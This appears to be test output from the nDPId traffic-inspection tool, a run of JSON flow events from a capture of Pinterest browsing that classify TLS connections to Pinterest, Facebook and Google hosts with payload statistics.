-00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722610,"flow_last_seen":1605289722642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722610,"flow_last_seen":1605289722642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605289716168,"flow_last_seen":1605289716373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":32185,"flow_avg_l4_payload_len":643,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726582,"flow_last_seen":1605289726637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726582,"flow_last_seen":1605289726637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605289715274,"flow_last_seen":1605289715612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":67017,"flow_avg_l4_payload_len":943,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718346,"flow_last_seen":1605289718372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718346,"flow_last_seen":1605289718372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12778,"flow_first_seen":1605289714142,"flow_last_seen":1605289717307,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65236,"flow_tot_l4_payload_len":20138391,"flow_avg_l4_payload_len":1576,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":343,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1605289732959,"flow_last_seen":1605289733342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":26978,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1605289715966,"flow_last_seen":1605289733391,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6358,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":808,"flow_first_seen":1605289714782,"flow_last_seen":1605289715303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16656,"flow_tot_l4_payload_len":1781636,"flow_avg_l4_payload_len":2204,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} -00671{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714251,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00615{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714251,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1605289715221,"flow_last_seen":1605289715740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16912,"flow_tot_l4_payload_len":133002,"flow_avg_l4_payload_len":1146,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00671{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00615{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289710318,"flow_last_seen":1605289710576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289710318,"flow_last_seen":1605289710576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00747{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":171,"flow_first_seen":1605289715782,"flow_last_seen":1605289724655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":150127,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2804,"flow_first_seen":1605289713743,"flow_last_seen":1605289734948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13624,"flow_tot_l4_payload_len":3671715,"flow_avg_l4_payload_len":1309,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605289714658,"flow_last_seen":1605289714873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":7307,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605289714590,"flow_last_seen":1605289716476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":38980,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::200a","src_port":57130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::200a","src_port":57130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722442,"flow_last_seen":1605289722621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":46918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722442,"flow_last_seen":1605289722621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":46918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 